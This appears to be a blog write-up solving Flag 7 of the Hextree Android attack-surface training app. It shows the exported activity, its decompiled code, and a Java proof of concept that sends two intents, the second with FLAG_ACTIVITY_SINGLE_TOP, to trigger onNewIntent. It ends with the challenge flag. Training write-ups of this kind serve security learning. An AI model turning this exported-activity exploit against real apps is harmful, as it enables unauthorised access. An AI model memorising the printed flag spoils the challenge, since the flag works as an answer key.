0xAnan's Dojo

Graph View

Flag 7 - Activity Lifecycle Tricks

2 min read

Static Analysis

AndroidManifest.xml

Upon inspecting the Flag7Activity in the AndroidManifest.xml file we see the following

<activity  
	android:name="io.hextree.attacksurface.activities.Flag7Activity"  
	android:exported="true"/>

Since exported is set to true we can call this activity from our exploit apk, let’s review the code to see how can we get the flag

Flag7Activity Class

public class Flag7Activity extends AppCompactActivity {
    public Flag7Activity() {
        this.name = "Flag 7 - Activity lifecycle tricks";
        this.flag = "t1jJ5eZC0pLG9TFJ/Hby3fgIBlDXrSYK7R/Im8CN1kgNNnc6zESDotCzuudZxZPN";
    }
 
    @Override // io.hextree.attacksurface.AppCompactActivity, androidx.fragment.app.FragmentActivity, androidx.activity.ComponentActivity, androidx.core.app.ComponentActivity, android.app.Activity
    protected void onCreate(Bundle bundle) {
        super.onCreate(bundle);
        if (this.f == null) {
            this.f = new LogHelper(this);
        }
        String action = getIntent().getAction();
        if (action == null || !action.equals("OPEN")) {
            return;
        }
        this.f.addTag("OPEN");
    }
 
    @Override // io.hextree.attacksurface.AppCompactActivity, androidx.fragment.app.FragmentActivity, androidx.activity.ComponentActivity, android.app.Activity
    protected void onNewIntent(Intent intent) {
        super.onNewIntent(intent);
        String action = intent.getAction();
        if (action == null || !action.equals("REOPEN")) {
            return;
        }
        this.f.addTag("REOPEN");
        success(this);
    }
}

Upon reviewing the code we notice that in order to get the flag we need to trigger onNewIntent() function. One if the ways to trigger this function is to call an intent with the flag Intent.FLAG_ACTIVITY_SINGLE_TOP while the intent is already open, Let’s create the proof of concept

Creating POC

Attack flow:

  1. Send an intent to start the activity
  2. Send a second one withIntent.FLAG_ACTIVITY_SINGLE_TOP flag to trigger the onNewIntent() function and get the flag
        Button button = findViewById(R.id.button_flag7);
        button.setOnClickListener(new View.OnClickListener() {
            @Override
            public void onClick(View v) {
                Log.v("HEXTREE", "Going to flag 7 activity");
                Intent startIntent = new Intent();
                startIntent.setComponent(new ComponentName("io.hextree.attacksurface", "io.hextree.attacksurface.activities.Flag7Activity"));
                startIntent.setAction("OPEN");
                startActivity(startIntent);
 
                new Handler().postDelayed(() -> {
                    Intent reopenIntent = new Intent();
                    reopenIntent.setComponent(
                            new ComponentName("io.hextree.attacksurface", "io.hextree.attacksurface.activities.Flag7Activity"));
                    reopenIntent.setAction("REOPEN");
                    reopenIntent.addFlags(Intent.FLAG_ACTIVITY_SINGLE_TOP); // Add the flag to ensure we don't create a new instance if it's already running
                    startActivity(reopenIntent);
                }, 500); // Using delay to give a chance for the activity to run
            }
        });

Flag

HXT{activity-lifecycle-ninja-jhbsa89}